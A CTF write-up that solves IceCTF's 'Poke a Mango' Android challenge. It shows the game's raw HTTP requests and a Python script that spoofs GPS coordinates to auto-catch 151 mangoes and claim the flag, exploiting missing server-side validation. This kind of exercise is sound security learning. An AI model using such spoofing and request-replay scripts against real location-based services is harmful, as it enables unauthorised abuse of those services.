IceCTF – Poke a Mango

IceCTF – Poke a Mango

This  test provides us an APK file through this link, called pokeamango.apk.

 

Analysis

This android application is similar to Pokemon GO, it’s about capturing mangoes, to be able to buy the flag once you have 151 captured. Analyzing the apk with jadx-gui, you can see the requests that we need. A first request lists the «mangoes» that we have nearby:

 

REQUEST:

POST /mango/list HTTP/1.1
Host: pokeamango.vuln.icec.tf
Content-Length: 51
Accept: */*
Origin: file://
User-Agent: Mozilla/5.0 (Linux; Android 7.1.1; Custom Tablet - 7.1.0 - API 25 - 1536x2048 Build/NMF26Q; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/52.0.2743.100 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-US
Cookie: __cfduid=d36133fde362614f502d0a864fb307a611536327276
X-Requested-With: tf.icec.pokeamango
Connection: close

lat=41.0777778&long=1.1799998&uuid=8fb6f1840fee5a88


RESPONSE:

HTTP/1.1 200 OK
Date: Wed, 12 Sep 2018 09:50:54 GMT
Content-Type: application/json
Connection: close
Server: cloudflare
CF-RAY: 459178f855833c1d-CDG
Content-Length: 866

{"mangos":[{"lat":41.0775367,"lng":1.1778177},{"lat":41.07847469999999,"lng":1.1795604},{"lat":41.0794147,"lng":1.1805652},{"lat":41.07758399999999,"lng":1.1782649},{"lat":41.0791775,"lng":1.1795028},{"lat":41.0782402,"lng":1.1797446},{"lat":41.0774597,"lng":1.1774596},{"lat":41.0781927,"lng":1.1809616},{"lat":41.0764728,"lng":1.1798654},{"lat":41.0764401,"lng":1.1799138},{"lat":41.076082,"lng":1.179158},{"lat":41.077837,"lng":1.1797852},{"lat":41.07882900000001,"lng":1.17955},{"lat":41.076564,"lng":1.179783},{"lat":41.0772666,"lng":1.1797385},{"lat":41.0773042,"lng":1.1791576},{"lat":41.07715779999999,"lng":1.1810705},{"lat":41.076599,"lng":1.180543},{"lat":41.0767187,"lng":1.1809404},{"lat":41.07724479999999,"lng":1.178256}],"token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1dWlkIjoiOGZiNmYxODQwZmVlNWE4OCJ9.IiUR3HdoRklnx7yVXMzBu3FJg3Hu0ev4L2b8RxqUBIg"}

 

And another request that captures them:

 

REQUEST:

POST /mango/catch HTTP/1.1
Host: pokeamango.vuln.icec.tf
Content-Length: 97
Accept: */*
Origin: file://
User-Agent: Mozilla/5.0 (Linux; Android 7.1.1; Custom Tablet - 7.1.0 - API 25 - 1536x2048 Build/NMF26Q; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/52.0.2743.100 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-US
Cookie: __cfduid=d36133fde362614f502d0a864fb307a611536327276
X-Requested-With: tf.icec.pokeamango
Connection: close

curLat=41.0777778&curLong=1.1799998&mangoLat=41.0775367&mangoLong=1.1778177&uuid=8fb6f1840fee5a88



RESPONSE:

HTTP/1.1 200 OK
Date: Wed, 12 Sep 2018 09:53:13 GMT
Content-Type: application/json
Connection: close
Server: cloudflare
CF-RAY: 45917c57f3523bf3-CDG
Content-Length: 156

{"message":"Mango Caught!","token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1dWlkIjoiOGZiNmYxODQwZmVlNWE4OCJ9.IiUR3HdoRklnx7yVXMzBu3FJg3Hu0ev4L2b8RxqUBIg"}


 

Well, with these two request we can capture 151 mangoes, and get the flag with this request:

 

REQUEST:

POST /store/flag HTTP/1.1
Host: pokeamango.vuln.icec.tf
Content-Length: 21
Accept: */*
Origin: file://
User-Agent: Mozilla/5.0 (Linux; Android 7.1.1; Custom Tablet - 7.1.0 - API 25 - 1536x2048 Build/NMF26Q; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/52.0.2743.100 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-US
Cookie: __cfduid=d36133fde362614f502d0a864fb307a611536327276
X-Requested-With: tf.icec.pokeamango
Connection: close

uuid=8fb6f1840fee5a88



RESPONSE:

HTTP/1.1 200 OK
Date: Wed, 12 Sep 2018 10:53:00 GMT
Content-Type: application/json
Connection: close
Server: cloudflare
CF-RAY: 4591d3efe0ae3c0b-CDG
Content-Length: 208

{"message":"IceCTF{gotta_poke_em_all_we_really_need_some_serverside_checking}","token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1dWlkIjoiOGZiNmYxODQwZmVlNWE4OCJ9.IiUR3HdoRklnx7yVXMzBu3FJg3Hu0ev4L2b8RxqUBIg"}

 

Here I coded a python script for get the flag:

 


#!/usr/bin/env python
#coding: utf8

import requests
import json
import sys

UUID = "8fb6f1840fee5a77"

def getCoordinates(lat,lng):
	burp0_url = "http://pokeamango.vuln.icec.tf:80/mango/list"
	burp0_cookies = {"__cfduid": "d36133fde362614f502d0a864fb307a611536327276"}
	burp0_headers = {"Accept": "*/*", "Origin": "file://", "User-Agent": "Mozilla/5.0 (Linux; Android 7.1.1; Custom Tablet - 7.1.0 - API 25 - 1536x2048 Build/NMF26Q; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/52.0.2743.100 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US", "X-Requested-With": "tf.icec.pokeamango", "Connection": "close"}
	burp0_data={"lat": "%s"%clat, "long": "%s"%clng, "uuid": "%s"%UUID}
	r = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
	
	if r.status_code is 200: #Success
		return r.text
	else: #error
		return 1


def getMango(clat,clng,lat,lng):

	burp0_url = "http://pokeamango.vuln.icec.tf:80/mango/catch"
	burp0_cookies = {"__cfduid": "d36133fde362614f502d0a864fb307a611536327276"}
	burp0_headers = {"Accept": "*/*", "Origin": "file://", "User-Agent": "Mozilla/5.0 (Linux; Android 7.1.1; Custom Tablet - 7.1.0 - API 25 - 1536x2048 Build/NMF26Q; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/52.0.2743.100 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US", "X-Requested-With": "tf.icec.pokeamango", "Connection": "close"}
	burp0_data={"curLat": "%s"%clat, "curLong": "%s"%clng, "mangoLat": "%s"%lat, "mangoLong": "%s"%lng, "uuid": "%s"%UUID}
	r = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
	if r.status_code is 200: #Success
		return r.text
	else: #error
		return 1
	

def getCount():
	burp0_url = "http://pokeamango.vuln.icec.tf:80/mango/count"
	burp0_cookies = {"__cfduid": "d36133fde362614f502d0a864fb307a611536327276"}
	burp0_headers = {"Accept": "*/*", "Origin": "file://", "User-Agent": "Mozilla/5.0 (Linux; Android 7.1.1; Custom Tablet - 7.1.0 - API 25 - 1536x2048 Build/NMF26Q; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/52.0.2743.100 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US", "X-Requested-With": "tf.icec.pokeamango", "Connection": "close"}
	burp0_data={"uuid": "%s"%UUID}
	r = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
	if r.status_code is 200: #Success
		return r.text
	else: #error
		return 1
		

def getFlag():
	burp0_url = "http://pokeamango.vuln.icec.tf:80/store/flag"
	burp0_cookies = {"__cfduid": "d36133fde362614f502d0a864fb307a611536327276"}
	burp0_headers = {"Accept": "*/*", "Origin": "file://", "User-Agent": "Mozilla/5.0 (Linux; Android 7.1.1; Custom Tablet - 7.1.0 - API 25 - 1536x2048 Build/NMF26Q; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/52.0.2743.100 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US", "X-Requested-With": "tf.icec.pokeamango", "Connection": "close"}
	burp0_data={"uuid": "%s"%UUID}
	r = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
	if r.status_code is 200: #Success
		return r.text
	else: #error
		return 1

for j in range(100):
	for i in range(0,999):
		clat = "41.0%s77778"%i#current lat
		clng = "1.1%s99998"%i#current long
		count = getCount()
		while  count == 1:#because the web is inestable
			count = getCount()
		if count[9:12] == '151':
			print getFlag();
			sys.exit(0) 
		response = getCoordinates(clat,clng)
		if response != 1:
			data = json.loads(response)
			for i in range(len(data["mangos"])):
				lat = data["mangos"][i]["lat"]
				lng = data["mangos"][i]["lng"]
				print "sending lat %s and lng %s"%(lat,lng)
				get = getMango(clat,clng,lat,lng)
				while  get == 1:#because the web is inestable
					get = getMango(clat,clng,lat,lng)

 

Example of script execution:

$ python script.py
sending lat 41.0663526 and lng 1.1709858
sending lat 41.0665607 and lng 1.1705412
sending lat 41.0962592 and lng 1.2006501
sending lat 41.06087 and lng 1.16179

...

sending lat 41.0839905 and lng 1.1853429
sending lat 41.0853402 and lng 1.183156
sending lat 41.0839701 and lng 1.1853559
{"message":"IceCTF{gotta_poke_em_all_we_really_need_some_serverside_checking}","token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1dWlkIjoiOGZiNmYxODQwZmVlNWE3NyJ9.7b1ZlrmCDiWimU2JdKnfkbwuUZkoOTvvIYU1x9JTUJ4"}

 

Cheers!

Los comentarios están cerrados